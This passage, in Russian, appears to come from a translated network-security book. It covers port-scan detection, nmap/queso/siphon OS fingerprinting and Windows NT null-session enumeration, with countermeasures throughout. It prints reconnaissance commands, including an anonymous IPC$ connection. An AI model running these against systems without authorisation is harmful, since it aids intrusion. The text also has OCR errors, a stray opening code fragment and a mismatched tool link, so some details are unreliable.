    the_recorder_portscan=recorder("
    bin/histogram packages/sandbox/portscan.cfg",
    "port_schema"
    );

    Для выявления попыток сканирования портов можно также воспользоваться утилитой snort (www.snort.org) (см. также http://spyjurenet.com/linuxrc.org/projects/ snort/). Как вы могли догадаться, эта утилита является одной из предпочитаемых нами программ IDS (заметим, что ее версии 1.x не позволяют обнаруживать фрагментацию пакетов). Вот пример листинга, содержащего данные о попытке сканирования портов.

    [**] spp_portscan: PORTSCAN DETECTED from 192.168.1.10 [**]
    05/22-18:48:53.681227
    [**] spp_portscan: portscan status from 192.168.1.10: 4 connections
    across 1 hosts: TCP(O), UDP(4) [**]
    05/22-18:49:14.180505
    [**] spp_portscan: End of portscan from 192.168.1.10 [**]
    05/22-18:49:34.180236

    Для платформы UNIX существует немало утилит, таких, например, как Утилита: scanlogd (http://www.openwall.com/scanlogd/) компании Solar Designer, которые выявляют и регистрируют попытки сканирования. Кроме того, утилиту Psionic PortSentry, созданную в рамках проекта Abacus (http://www.psionic.com/abacus), можно настроить не только на регистрацию, но и на принятие контрмер при выявлении факта активного сканирования. Один из способов борьбы с попытками сканирования портов заключается в автоматической установке для ядра правил фильтрации, когда к уже существующим добавляется новое правило, запрещающее доступ со стороны узла-нарушителя. Такое правило можно задать в конфигурационном файле утилиты PortSentry. При этом одно и то же правило может отличаться в различных системах. Для системы Linux 2.2.x, в которой имеется поддержка ядра брандмауэра, в файл portsentry.conf нужно добавить запись, аналогичную следующей.

    # New ipchain support for Linux kernel version 2.102+
     KILL_ROUTE="/sbin/ipchains -I input -s $TARGET$ -j DENY -1"

    Утилита PortSentry совместима с большинством версий UNIX, включая Solaris. Независимо от того, применяете ли вы какие-либо утилиты или нет, необходимо помнить, что массированные попытки сканирования портов, инициируемые каким-либо узлом или какой-нибудь сетью, могут означать, что кто-то изучает вашу сеть. Всегда обращайте самое пристальное внимание на такие действия, поскольку за ними может последовать полномасштабное вторжение. И наконец, не забывайте о том, что имеется возможность активного противостояния или блокирования попыток сканирования портов. Все эти вопросы рассматриваются в статье, опубликованной компанией Solar Designer (http://www. openwall.com/scanlogd/P53-13.gz). В этой статье содержатся дополнительные советы по разработке и использованию систем выявления попыток сканирования.
    Большинство брандмауэров не только могут, но и должны настраиваться на режим обнаружения попыток сканирования. Однако одни брандмауэры справляются с этой задачей лучше, другие хуже. Например, некоторые брандмауэры умеют выявлять скрытое сканирование. Однако многие из них, поддерживая режим выявления SYN-сканирования, абсолютно игнорируют FiN-сканирование. Самой большой проблемой при выявлении факта сканирования является задача анализа огромных системных журналов, накапливаемых при ежедневной работе серверов сети. Для упрощения решения этой задачи можно воспользоваться утилитой Psionic Logcheck (http: //www.-psionic.com/abacus/logcheck/). Кроме того, мы рекомендуем настроить утилиты таким образом, чтобы они реагировали на обнаруженные попытки сканирования в реальном времени, отсылая сообщения по электронной почте. Везде, где это только возможно, устанавливайте пороговые значения для количества регистрируемых событий (threshold logging), чтобы взломщик не завалил ваш почтовый ящик грудой сообщений, в которых будет так же трудно найти информацию, как и в системных журналах. Кроме того, в этом случае может также возникнуть условие DoS. При использовании пороговых значений все предупреждения будут группироваться, а не обрабатываться по одному. Как минимум необходимо настроить систему безопасности на выдачу отчетов о самом факте выявленной попытки сканирования. Для брандмауэра Firewall-1 с этой целью можно использовать утилиту Ланца Спитцнера (Lance Spitzner) alert, sh (http://www. enteract.com/~lspitz/intrusion.html). Эта утилита будет выявлять и отслеживать попытки сканирования портов, работая под управлением Firewall-1 в качестве средства защиты, заданного пользователем.
    Для платформы Windows NT также имеется несколько утилит, предназначенных для выявления попыток сканирования. Прежде всего, необходимо отметить такую утилиту, как Genius 2.0, разработанную компанией Independent Software (http://www. indiesoft.com) для платформ Windows 95/98 и Windows NT. Этот программный продукт предоставляет гораздо больше возможностей, чем простое средство обнаружения TCP-сканирования портов. Однако необходимо отметить, что даже с учетом этого, имеет смысл его использовать. Утилита Genius отслеживает многочисленные запросы к открытым портам и при обнаружении попыток сканирования отображает на экране предупреждающее диалоговое окно, в котором содержится IP-адрес взломщика и доменное имя его узла.
    Утилита Genius позволяет выявлять как попытки обычного сканирования, т.е. с установлением TCP-соединения, так и SYN-сканирования.


    Еще одним детектором сканирования для системы Windows, заслуживающем отдельного упоминания, является программа BlackICE (рис. 2.7) компании Network ICE (http://www.-networkice.com). Данная программа представляет первое основанное на использовании агентов средство выявления вторжений, которое можно использовать как в Windows 9х, так и в NT. В момент написания данной книги этот программный продукт был коммерческим, хотя в ближайшем будущем компания обещает подготовить свободно распространяемую версию. И наконец, программа ZoneAlarm (http://www.zonelabs.com/zonealarm.htm) хорошо подходит для платформы Windows и может применяться в качестве средства IDS на уровне брандмауэра.



    Рис. 2.7. Кроме обнаружения обычного TCP-сканирования портов, программа BlackICE может выявлять также VDP-сканирование, запросы на открытие нулевых сеансов NT, pir.q-прослушивание с помощью пакета pcAnywhere, попытки взлома с помощью WinNuke, множественные запросы, применение утилиты tracerovte, Smurf-взломы и многое другое

    Предотвращение сканирования



    Вряд ли можно помешать кому-либо предпринять попытку сканирования портов на вашем компьютере, однако вполне реально свести к минимуму связанный с этим риск. Для этого нужно заблокировать все службы, в работе которых нет необходимости. В среде UNIX данная задача решается с помощью добавления символов комментария в соответствующие строки файла /etc/inetd. corif, а также отключения автоматического запуска ненужных служб в сценарии начальной загрузки. Более подробно эти вопросы освещены в главе 8, "Хакинг UNIX".
    В системе Windows NT также целесообразно отключить все ненужные службы. Однако сделать это сложнее, поскольку из-за сетевой архитектуры Windows NT по крайней мере Порт 139 должен работать постоянно. Тем не менее, остальные службы можно отключить, запустив аплет Services панели управления. Способы нарушения безопасности системы Windows NT и контрмеры, которые можно предпринять для их предотвращения, более подробно будут рассмотрены в главе 5. Здесь же стоит упомянуть о том, что компанией Tiny Software (www.tinysoftware.com) распространяется модуль ядра, позволяющий выполнять фильтрацию входящих пакетов. С помощью этого модуля можно защитить большинство важных портов.
    Что же касается других операционных систем и устройств, то нам остается лишь посоветовать как можно внимательнее прочитать соответствующие справочные руководства. Постарайтесь найти в них информацию о том, какие порты вам действительно необходимы и как отключить остальные, чтобы свести риск к минимуму.

    Активное определение операционной системы



    Итак, мы убедились, что существует множество различных приемов и средств сканирования портов. Вспомните, что при сканировании портов преследуется две основные цели. Во-первых, нужно установить, какие TCP- и UDP-порты на исследуемом компьютере находятся в состоянии ожидания запросов. Во-вторых, необходимо определить тип операционной системы, используемой на удаленном узле. Информация об операционной системе понадобится на последующих этапах, при составлении схемы уязвимых участков. Об этом речь пойдет в последующих главах. Важно помнить, что при этом необходимо быть особенно точным и внимательным к мелочам. Именно поэтому очень важно абсолютно правильно установить тип удаленной операционной системы. При определении типа ОС очень полезной оказывается косвенная информация, получаемая, например с помощью сбора маркеров, о которых мы поговорим в главе 3. При этом будет собрана информация о таких службах, как FTP, telnet, SMTP, HTTP, POP и других. Сбор маркеров — это один из самых простых методов определения типа операционной системы, а также версий работающих под ее управлением служб. Нетрудно догадаться, что существуют различные средства, призванные помочь в решении этой задачи. Среди доступных можно отметить две утилиты, позволяющие получить самые точные результаты, — уже хорошо нам известная nmар и утилита queso. Точность результатов, выдаваемых обеими утилитами, объясняется, прежде всего, тем, что обе они предоставляют возможность исследования стека протоколов TCP/IP (stack fingerprinting).


    7.gif

    Изображение: 

    8.gif

    Изображение: 

    7. Активное исследование стека



    Активное исследование стека


    Прежде чем перейти к рассмотрению возможностей утилит nmap и queso, необходимо вкратце пояснить, в чем же состоит суть исследования стека TCP/IP. Исследование стека (stack fingerprinting) — это очень мощная технология, позволяющая быстро определить тип и версию операционной системы узла с высокой степенью вероятности. Очевидно, что разные разработчики по-разному подходят к реализации стека TCP/IP. В частности, многие разработчики по-своему трактуют рекомендации документов RFC, что впоследствии проявляется в логике работы тех или иных сетевых служб. Таким образом, зная о существующих различиях и проверив реакцию служб изучаемой системы на различные ситуации, можно практически однозначно определить тип и версию соответствующей операционной системы. Для достижения максимальной достоверности при исследовании стека требуется по крайней мере один порт, находящийся в режиме ожидания запросов. С помощью утилиты nmap можно выдвинуть предположение об используемой операционной системе даже при отсутствии таких портов, однако степень его достоверности в этом случае будет невысокой. Полное описание процесса исследования стека можно найти в статье Федора (Fyodor), впервые публикованной в журнале Phrack Magazine.
    Ниже приведен перечень тестов, которые можно использовать в процессе исследования стека для определения типа и версии операционной системы.

    •  Передача пакетов FIN (FIN probe). Пакет FIN отсылается в открытый порт. Как уже упоминалось, согласно документу RFC 793 исследуемая система не должна отвечать на такое сообщение. Однако многие реализации стека (например, Windows NT) отвечают на них, отправляя пакет FIN/ACK.
    •  Попытка установки флагов (bogus flag probe). Отсылается пакет SYN с установленным флагом в заголовке TCP, значение которого не определено спецификацией протокола. Некоторые операционные системы, например Linux, в ответном пакете устанавливают этот же флаг.
    •  Изучение начальной последовательности (Initial Sequence Number (ISN) sampling). Основная задача этого теста — попытаться определить характерные признаки начальной последовательности, генерируемой узлом при получении запроса на установку соединения, которые характерны для той или иной реализации TCP.
    •  Мониторинг бита фрагментации ("don't fragment bit" monitoring). Этот бит устанавливается некоторыми операционными системами для повышения производительности. Проверка данного бита может помочь в определении типа операционной системы, для которой характерно такое поведение.
    •  Исходный размер окна TCP (TCP initial window size). Для некоторых реализаций стека протоколов TCP/IP данный параметр уникален, что способствует точности определения типа операционной системы.
    •  Значение АСК (дек value). В различных реализациях стека IP по-разному задается значение поля АСК. В одних случаях возвращается полученный от вас номер последовательности, а в других — значение номера последовательности, увеличенное на 1.
    •  Обработка сообщений об ошибках ICMP (ICMP error message quenching). Некоторые операционные системы следуют рекомендациям документа RFC 1812 (www. ietf.org/rfc/rfcl812.txt) и ограничивают скорость передачи сообщений об ошибках. Поэтому, отправляя UDP-пакеты на какой-либо порт (обычно с большим номером), вполне реально измерить количество сообщений об ошибках, поступившее за определенный период, и определить таким образом тип операционной системы.
    •  Измерение длины сообщений ICMP (ICMP message quoting). При возникновении ошибок ICMP разными операционными системами передаются сообщения различной длины. Проанализировав полученное сообщение, можно сделать некоторые предположения об исследуемой операционной системе.
    •  Проверка целостности ответных сообщений об ошибках ICMP (ICMP error message-echoing integrity). В некоторых реализациях стека используется изменение заголовка IP при возврате сообщений об ошибках ICMP. Проверив тип изменений, внесенных в заголовок, можно сделать некоторые предположения об операционной системе исследуемого узла.
    •  Тип службы (TOS — type of service). Можно проверять поле TOS для сообщений "ICMP port unreachable" (порт недоступен). В большинстве реализаций это поле имеет значение 0, однако иногда используются и другие значения.
    •  Обработка фрагментации (fragmentation handling). Как отмечают Томас Пташек (Thomas Ptacek) и Тим Ньюсхам (Tim Newsham) в своей известной статье Insertion, Evasion, and Denial of Service: Eluding Network Intrusion Detection (http://www. clark.net/~roesch/idspaper.html), различные стеки обрабатывают перекрывающиеся сообщения по-разному. При сборке фрагментированньк пакетов некоторые стеки записывают новые данные поверх старых и наоборот. Проверив, каким образом были собраны тестовые пакеты, можно сделать предположение об исследуемой операционной системе.
    •  Параметры TCP (TCP options). Параметры TCP определены в документе RFC 793 и недавно изданном RFC 1323 (www.ietf.org/rfc/rfcl323.txt). Нововведения, описанные в RFC 1323, нашли отражение только в самых последних реализациях стеков. Отправляя пакет с набором различных параметров, таких как по operation, maximum segment size, window scale factor, timestamp и так далее, можно сделать вывод о типе и версии операционной системы.

    Для того чтобы воспользоваться утилитой nmap и выполнить все перечисленные тесты (за исключением обработки фрагментации и обработки сообщений об ошибках ICMP), достаточно указать в командной строке параметр -о. Давайте посмотрим, как будет выглядеть полученный результат.

    [tsunami] nmap -0192.168.1.10
    Starting nmap V. 2.53 by fyodor@insecure.org
    Interesting ports on shadow (192.168.1.10) :
    Port State Protocol Service
    7 open tcp echo
    9 open tcp discard
    13 open tcp daytime
    19 open tcp chargen
    21 open tcp ftp
    22 open tcp ssh
    23 open tcp telnet
    25 open tcp smtp
    37 open tcp time
    111 open tcp sunrpc
    512 open tcp exec
    513 open tcp login
    514 open tcp shell
    2049 open tcp nfs
    4045 open tcp lockd
    TCP Sequence Prediction: Class=randorn positive increments
    Difficulty=26590 (Worthy challenge)
    Remote operating system guess: Solaris 2.5, 2.51

    Как видно, при включении режима исследования стека утилиты nmap можно легко получить достаточно точное определение типа и версии операционной системы. Даже если на изучаемом узле не открыто ни одного порта, утилита nmap поможет сделать довольно точное предположение об используемой операционной системе.

    [ tsunami]# nmap -p80 -0 10.10.10.10
    Starting nmap V. 2.53 by fyodor@insecure.org
    Warning: No ports found open on this machine,
    OS detection will be
    MUCH less reliable
    No ports open for host (10.10.10.10)
    Remote OS guesses: Linux 2.0.27 - 2.0.30, Linux 2.0.32-34,
    Linux 2.0.35-36, Linux 2.1.24 PowerPC,
    Linux 2.1.76, Linux 2.1.91 - 2.1.103,
    Linux 2.1.122 - 2.1.132; 2.2.0-prel - 2.2.2, Linux 2.2.0-pre6 - 2.2.2-ac5
    Nmap run completed -- 1 IP
    address (1 host up) scanned in 1 second

    Как видно из приведенного листинга, утилита nmap даже без открытых портов, правильно определила операционную систему Linux.
    Одной из примечательных особенностей утилиты nmap является то, что листинг сигнатур хранится в отдельном файле с именем nmap-os-fingerprints. При появлении каждой новой версии утилиты этот файл также обновляется, и на момент написания данной книги в нем содержались сотни сигнатур. Если вы хотите добавить новые сигнатуры и повысить таким образом эффективность утилиты nmap, обратитесь ПО адресу http://www.insecure.org:80/cgi-bin/nmap-submit.cgi.
    Хотя на момент написания данной книги утилита nmap, по-видимому, позволяет наиболее точно выполнить исследование стека TCP/IP, она, тем не менее, является далеко не первой программой, в которой реализована соответствующая технология. До того как Федор встроил в утилиту nmap средства определения операционной системы, для этих же целей уже была создана утилита queso (http://www.apostols.org/projectz/). Необходимо отметить, что утилита queso не позволяет выполнять сканирование портов и может определять тип операционной системы только при наличии в исследуемой системе открытого порта (по умолчанию используется порт 80). Если порт 80 закрыт, необходимо задать другой открытый порт, как показано в следующем примере, в котором с помощью утилиты queso осуществляется попытка определить тип операционной системы через порт 25. 

    [tsunami] queso 10.10.10.20:25
    10.10.10.20:25 * Windoze 95/98/NT

    Контрмеры: защита от определения операционной системы


    Обнаружение попыток определения операционной системы



    Многие из упоминавшихся выше средств выявления сканирования с успехом могут служить и для обнаружения попыток определения типа операционной системы, Хотя они не проинформируют вас о том, что выполнялось специальное сканирование с помощью утилиты nmap или queso, с их помощью все же удастся распознать сам факт такого особого сканирования, например с установкой флага SYN.

    Предупреждение попыток определения операционной системы



    Хотелось бы посоветовать какое-нибудь средство, позволяющее противодействовать попыткам определения операционной системы, однако, к сожалению, вынуждены констатировать, что решить эту проблему весьма непросто. Конечно, можно изменить исходный код операционной системы (естественно, если он имеется в вашем распоряжении) или поменять ее параметры, влияющие на характеристики стека, однако такое вмешательство может значительно изменить функциональность ОС. Например, в системе FreeBSD 4.x имеется параметр ядра TCP_DROP_SYNFIN, который можно применить для игнорирования пакетов SYN+FIN, используемых утилитой nmap в целях исследования стека. Установка этого параметра поможет пресечь попытки определения типа операционной системы, однако в то же время нарушит поддержку RFC 1644 (TCP Extensions for Transactions).
    Вместо этого мы предлагаем создавать такие сети, в которых сканированию могли бы подвергнуться лишь надежные и хорошо защищенные proxy-серверы и брандмауэры, а не компьютеры внутренней сети. В этом случае, даже если взломщику и удастся разведать тип операционной системы того или иного узла, проникновение через устройства защиты будет значительно затруднено.

    Пассивное определение операционной системы



    Из предыдущих разделов видно, насколько эффективными оказываются средства активного исследования стека, такие как утилиты nmap и queso. Важно не забывать о том, что рассмотренные выше приемы являются активными по своей природе. При этом для определения специфических особенностей сетевого стека и используемой операционной системы каждому узлу нужно передавать тестовые пакеты. Поскольку все активные методы предполагают передачу пакетов, системам выявления вторжений относительно просто выявить все предпринимаемые попытки идентификации операционной системы. Другими словами, активное исследование является далеко не самым скрытым методом, к которому может прибегнуть взломщик.


    8. Пассивное исследование стека



    Пассивное исследование стека


    Основные принципы пассивного исследования стека аналогичны концепциям, лежащим в основе его активного исследования. Однако в данном случае вместо передачи пакетов для определения используемой операционной системы взломщик осуществляет мониторинг сетевого трафика. Таким образом, наблюдая за сетевым трафиком между различными компьютерами, можно определить тип и версию удаленной операционной системы. Большие исследования в этой области были проведены Ланцом Спитзнером (Lance Spitzner). На их основе была написана книга, которую можно найти по адресу http://www.enteract.com/~lspitz/finger.html. Кроме ТОГО, по адресу http://www.subterrain.net/projects/siphon можно также найти утилиту siphon, предназначенную для пассивного исследования портов и идентификации операционной системы. Теперь познакомимся с тем, как же выполняется пассивное исследование стека.

    Параметры, используемые для пассивного исследования стека



    Для определения типа и версии операционной системы можно использовать самые разнообразные признаки. Однако сейчас мы ограничимся рассмотрением лишь нескольких атрибутов, связанных с сеансом сетевого взаимодействия с помощью протокола TCP/IP.

    •  атрибутов TTL (Time-to-Live — время жизни). Устанавливает ли операционная система значение TTL для исходящих пакетов?
    •  Windows Size (размер окна). Какой размер окна используется?
    •  DF (Don't Fragment — бит фрагментации). Устанавливается ли операционной системой признак DF?
    •  TOS (Type-of-Service — тип службы). Устанавливается ли операционной системой значение TOS. Если да, то какое?

    Проанализировав каждый из атрибутов и сравнив полученные результаты со значениями из имеющейся базы данных, можно определить удаленную операционную систему. Поскольку этот метод не гарантирует получения правильного ответа на основе каждого из атрибутов в отдельности, для получения более надежных результатов атрибуты можно комбинировать. Именно такой подход и используется утилитой siphon.
    Вот как работает описанный метод. Если с помощью утилиты telnet установить удаленное соединение между узлами 192 .168 .1.10 и 192 .168 .1.11 , то с использованием утилиты siphon можно определить тип удаленной операционной системы.
    [shadow]# telnet 192.168.1.11
    С помощью нашей любимой утилиты snort можно частично просмотреть пакеты, передаваемые в процессе сетевого взаимодействия.

    06/04-11:23:48.297976 192.168.1.11:23 -> 192.168.1.10:2295
    TCP TTL:255 TOS:OxO 10:58934 DF
    **S***A* Seq: OxD3B709A4 Ack: OxBE09B2B7 Win: 0x2798
    TCP Options => NOP NOP TS: 9688775 9682347 NOP WS: 0 MSS: 1460

    При этом видно, что упоминавшиеся выше атрибуты принимают следующие значения:

    •  TTL= 255
    •  Размер окна = 2798
    •  Бит DF = Yes A TOS = 0

    Теперь обратимся к базе данных утилиты siphon — файлу osprints.conf: 

    [shadow]f grep -i Solaris osprints.conf
    # Window:TTL:DF:Operating System DF = 1 for ON, 0 for OFF.
    2328:255:l:Solaris 2.6 - 2.7
    2238:255:l:Solaris 2.6 - 2.7
    2400:255:l:Solaris 2.6 - 2.7
    2798:255:l:Solaris 2.6 - 2.7
    FE88:255:l:Solaris 2.6 - 2.7
    87CO:255:l:Solaris 2.6 - 2.7
    FAFO:255:0:Solaris 2.6 - 2.7
    FFFF:255:1:Solaris 2.6-2.7

    Из приведенного фрагмента видно, что в четвертой записи содержатся те же значения, которые были получены с использованием утилиты snort. Таким образом, с помощью утилиты siphon можно точно определить исследуемую операционную систему. 

    [crush]# siphon -v -i xl0 -о fingerprint.out
    Running on: 'crush' running FreeBSD 4.0-RELEASE on a(n) i386
    Using Device: xlO
    Host Port . TTL DF Operating System 192.168.1.11 23 255 ON Solaris 2.6 - 2.7

    Итак, в качестве удаленной была определена система Solaris 2.6. И это .не вызвало особых проблем.
    Пассивное исследование стека взломщик может использовать для выбора потенциальных жертв. Для этого достаточно понаблюдать за соответствующим Web-узлом и проанализировать сетевой трафик либо воспользоваться утилитой siphon. Несмотря на то что описанный метод является достаточно эффективным, он все же имеет некоторые ограничения. Во-первых, в приложениях, генерирующих свои собственные пакеты (например, шпар), не применяются те же признаки, что и самой операционной системой. Поэтому полученные результаты могут оказаться неточными. Во-вторых, на удаленном узле можно без проблем изменить атрибуты соединения. 

    Solaris: ndd -set /dev/ip ip_def_ttl 'число'
    Linux: echo 'число' > /proc/sys/net/ipv4/ip_default_ttl
    NT:
    HKEY_LOCAL_MACHINE\System\CurrentControlSet\
    Services\Tcpip\Parameters

    Контрмеры: защита от пассивного определения операционной системы



    Для защиты от пассивного определения операционной системы можно использовать приемы, описанные в разделе "Контрмеры: Защита От Определения Операционной Системы".


    9. Средства автоматического сбора информации

     

    Средства автоматического сбора информации

    Помимо описанных в данной главе, существует огромное количество других средств, и каждый день этот список увеличивается. Поскольку в рамках одной книги описать все эти средства невозможно, вкратце остановимся лишь на двух из них.
    Утилита cheops (произносится "ки-опс", https://www.comparitech.com/net-admin/best-netflow-analyzers-collectors/), изображенная на рис. 2.8, представляет собой программу с графическим интерфейсом, предназначенную для полномасштабного исследования сети. При этом в одном пакете объединены утилиты ping, traceroute, средства сканирования портов, а также определения типа операционной системы (с помощью queso). Кроме этого, cheops позволяет получить графическое схематическое изображение исследуемой сети и связанных с ней сетей, что значительно облегчает понимание ее архитектуры.

    Рис. 2.8. Пакет cheops с графическим интерфейсом объединяет многие популярные утилиты исследования сетей

    Вторая утилита, на которой мы остановимся, называется tkined и входит в состав пакета Scotty (http://wwwhome.cs.utwente.nl/~schoenw/scotty/). По существу, эта утилита является редактором сетевого редактирования, написанным на языке Tel, который, объединяет различные средства управления сетью, обеспечивающие сбор всевозможной информации об архитектуре и работе сети. Утилита tkined обладает большой гибкостью и позволяет проводить исследование сети с представлением результатов в графической форме. Хотя с ее помощью нельзя определить тип операционной системы, она обеспечивает выполнение большинства операций, описанных как в данной главе, так и главе 1. Кроме утилиты tkined, в состав пакета Scotty входит немало других интересных средств, заслуживающих самого пристального внимания.

    Контрмеры: защита от средств автоматического сбора информации

     

    Поскольку в автоматизированных средствах, подобных Scotty, tkined и cheops, объединены приемы, о которых рассказывалось выше в данной главе, для защиты от них можно применять контрмеры, аналогичные тем, которые применяются для соответствующих средств сбора информации, сканирования и т.д.

     

    9.gif

    Изображение: 

    10. Резюме



    Резюме


    В данной главе мы рассмотрели средства и методы, предназначенные для осуществления ping-прослушивания (как с помощью протокола ICMP, так и с помощью TCP), сканирования портов и определения типа операционной системы. С помощью средств ping-прослушивания можно идентифицировать узлы сети, подключенные к Internet, что позволяет сузить область поиска потенциальных целей. Затем с помощью бесчисленного множества различных методов и средств TCP- и UDP-сканирования можно установить службы, которые запущены на этих узлах и находятся в состоянии ожидания запросов, а также сделать предположения о степени уязвимости исследуемых систем. И наконец, мы рассмотрели, как взломщик может использовать программное обеспечение, предназначенное для определения типа и номера версии операционной системы, под управлением которой работает исследуемый узел. В следующей главе вы увидите, что собранная до сих пор информация очень важна для того, чтобы осуществить сфокусированную атаку.


    Глава 3. Инвентаризация



    Глава 3. ИНВЕНТАРИЗАЦИЯ




    1. Инвентаризация



    Инвентаризация


    Собрав полное "досье" на исследуемую сеть и "прощупав" систему ее защиты, хакер, скорее всего, на этом не остановится. Следующим шагом на пути к проникновению в систему будет получение информации о пользовательских учетных записях или плохо защищенных совместно используемых ресурсах. Для сбора такой информации существует много различных способов, которым дали общее название — инвентаризация (enumeration). В данной главе подробно рассматриваются основные методы, используемые в процессе инвентаризации.
    Ключевое различие между ранее описанными методами сбора информации и методами инвентаризации состоит в уровне вмешательства в работу исследуемой сети. Процесс инвентаризации предполагает установку активного соединения с исследуемой системой и генерацию направленных запросов. Такая деятельность может (и должна!) регистрироваться исследуемой системой, поэтому мы покажем, на какие события необходимо обращать внимание, а также как по возможности блокировать попытки проведения инвентаризации вашей сети.
    На первый взгляд большая часть информации, которую можно получить при инвентаризации, довольно безобидна. Однако сам факт утечки информации сквозь незакрытую брешь в системе защиты говорит о недостаточном внимании к безопасности со стороны администратора сети, что мы неоднократно проиллюстрируем на протяжении данной главы. Как правило, после получения реального имени пользователя или обнаружения совместно используемого ресурса подбор пароля или выявление изъянов в реализации протокола совместного использования ресурсов — только вопрос времени. Заблокировав все эти "дыры" в системе защиты (тем более, что сделать это несложно), вы сможете значительно снизить вероятность успеха попыток хакера.
    Информация, которую взломщики могут получить при инвентаризации, можно разделить на следующие категории.

    •  Сетевые ресурсы, в том числе открытые для совместного доступа.
    •  Пользователи и группы пользователей.
    •  Приложения и идентификационные маркеры (banner).

    Методика инвентаризации в значительной степени зависит от операционной системы (именно поэтому так важна информация, полученная на этапе сканирования портов и установления типа и версии операционной системы, о чем шла речь в главе 2). Зная, какая информация может заинтересовать хакера и насколько хорошо ваша система ее скрывает, вы можете предпринять ответные меры, которые позволят защитить самые уязвимые участки.
    Данная глава состоит из трех разделов, каждый из которых посвящен конкретной операционной системе — Windows NT/2000, Novell NetWare и UNIX. Мы не уделяем особого внимания системе Win 9x, поскольку рассматриваемые здесь приемы определения учетных записей и открытых совместно используемых ресурсов не имеют непосредственного отношения к ее однопользовательской архитектуре. Однако следует заметить, что все методы, пригодные для инвентаризации Windows NT/2000, прекрасно работают и в случае Win Эх. В каждом разделе приводятся сведения о методах, применяемых для получения перечисленных выше сведений, а также о том, как их выявлять и по возможности защищаться.


    2. Инвентаризация Windows NT/2000



    Инвентаризация Windows NT/2000


    За все время своего существования Windows NT заслужила репутацию системы, которая предоставляет общедоступную информацию по любому удаленному запросу. В основном это осуществляется через протоколы передачи данных CIFS/SMB (Common Internet File System/Server Message Block), от которых в значительной степени зависит работа сетевых служб. Хотя в Win 2000 имеется возможность автономного использования протокола TCP/IP без протокола NetBIOS, она получила в наследство все недостатки своей предшественницы. Система Win 2000 содержит также несколько новых возможностей, которые могут заинтересовать случайного сборщика информации. В данной главе будут обсуждаться и старые, и новые особенности, а также рекомендуемые действия, с помощью которых можно защитить ценную информацию еще до того момента, когда кто-либо соберет достаточное количество информации для крупномасштабной атаки.

    Windows NT/2000 Hacking Kit



    Начиная с версии Windows NT 3.1 компания Microsoft предлагает за отдельную плату дополнительный комплект документации и компакт-диск, на котором собрано множество утилит для администрирования сетей на базе Windows NT — Windows NT Resource Kit (как в варианте Workstation, так и в варианте Server). В комплект NTRK (так мы будем называть его далее в этой книге) входит обширная подборка различных утилит, начиная от частично реализованного интерпретатора популярного языка сценариев Perl, позволяющего перенести на платформу NT многие популярные утилиты UNIX, и заканчивая утилитами удаленного администрирования, не входящими в стандартный комплект поставки Windows NT. Без данного комплекта не может обойтись ни один серьезный администратор NT.
    Однако, помимо удобства в использовании, функциональность NTRK имеет и обратную сторону. Многие из этих инструментов могут служить взломщикам для получения важной информации, благодаря чему в определенных кругах комплект получил название Windows NT Hacking Kit (набор инструментов хакера). Поскольку розничная цена пакета NTRK составляет около $200, включая два обновленных дополнения, можно предположить, что любой взломщик, для которого данная сумма является достаточно приемлемой, может воспользоваться входящими в его состав инструментами для проникновения в вашу сеть (особенно если учесть, что некоторые из них распространяются свободно через FTP-узел компании Microsoft по адресу ftp://ftp. microsoft.com/bussys/winnt/winnt-public/reskit/).
    Версия комплекта для Win 2000 (W2RK) продолжает ранее начатую традицию и содержит многочисленные инструменты, которые можно использовать двояким образом. Кроме того, на компакт-диске для операционной системы Win 2000 Server в папке SupportXTools содержится множество утилит, которые могут оказаться полезными для хакера. В данной главе будут рассмотрены те средства и утилиты, которые в значительной мере способны облегчить решение задачи инвентаризации. Другие же средства мы рассмотрим в главах 5 и 6.

    Интерпретатор языка Perl, имеющийся в комплекте NTRK, предоставляет не такие широкие возможности, как комплект для Windows от компании ActiveState, который можно найти по адресу http://www.activestate.com. В комплект W2RK компанией Microsoft включена версия ActivePerl Build 521 компании ActiveState. Если вы планируете использовать язык Perl в Windows, мы советуем обратиться именно к этой реализации, поскольку многие из рассматриваемых в книге утилит, реализованных на этом языке, в случае применения интерпретатора Perl из набора NTRK работают некорректно.Хотя сознательным администраторам NT/2000 мы настоятельно рекомендуем приобретать все комплекты NTRK и отслеживать все новшества, не устанавливайте их на действующих серверах. В противном случае вы обратите оружие против себя! Для обеспечения требуемой функциональности устанавливайте лишь наиболее важные утилиты. Для хранения поместите на съемный или сетевой диск все утилиты NTRK и используйте их лишь при необходимости.

    Нулевые соединения: "Священный Грааль" инвентаризации



    Как уже упоминалось, системы Windows NT/2000 имеют ахиллесову пяту при использовании протоколов CIFS/SMB и NetBIOS в режиме, используемом по умолчанию. В состав стандартов CIFS/SMB и NetBIOS входят программные интерфейсы, возвращающие различную информацию о компьютере через порт TCP с номером 139. Такие данные смогут получить даже те пользователи, которые не были аутентифицированы. Первым шагом на пути получения удаленного доступа к этим интерфейсам является создание простого, без аутентификации, соединения с системой NT/2000 с помощью так называемого нулевого сеанса (null session). Предполагается, что в результате ранее выполненного сканирования портов было установлено, что TCP-порт 139 находится в состоянии ожидания запросов. Такое соединение можно установить с помощью следующей команды.
    net use \\192.168.202.33\IPC$ "" /u:""
    При выполнении такой команды осуществляется подключение к скрытому каналу связи между процессами (share) IPC$ no IP-адресу 192.168.202.33 в качестве анонимного пользователя (/и:"") с пустым паролем (""). Если такая попытка окажется успешной, взломщик получает открытый канал, через который он может попытаться применить различные методы, описанные в данной главе, чтобы получить как можно больше информации о сети, совместно используемых ресурсах, пользователях, группах, ключах системного реестра и т.д.
    Практически все методы сбора информации, описанные в данной главе, используют недостаток системы безопасности Windows NT, состоящий в предоставлении возможности анонимного подключения и инвентаризации определенных ресурсов без требования каких-либо паролей. Этот недостаток, который в различных источниках называется по-разному, — "красная кнопка" (Red Button), нулевой сеанс или анонимное подключение (anonymous logon) — является единственной существенной возможностью, с помощью которой потенциальные взломщики могут получить всю нужную им информацию.

    Нулевой сеанс: контрмеры



    При установке нулевого соединения требуется доступ к TCP-порту 139, так что наиболее правильный путь предотвращения такой опасности состоит в фильтрации запросов по протоколу NetBIOS к портам TCP и UDP с номерами от 135 до 139 по всему периметру сетевых устройств управления доступом. Необходимо также запретить использование протокола NetBIOS поверх TCP/IP и на отдельных узлах, отсоединив клиент WINS (TCP/IP) от соответствующего интерфейса с помощью аплета Network панели управления. В системе Windows 2000 для этого нужно запустить аплет соответствующего сетевого подключения, открыть диалоговое окно Advanced TCP/IP Settings, перейти во вкладку WINS и отключить режим Disable NetBIOS Over TCP/IP.

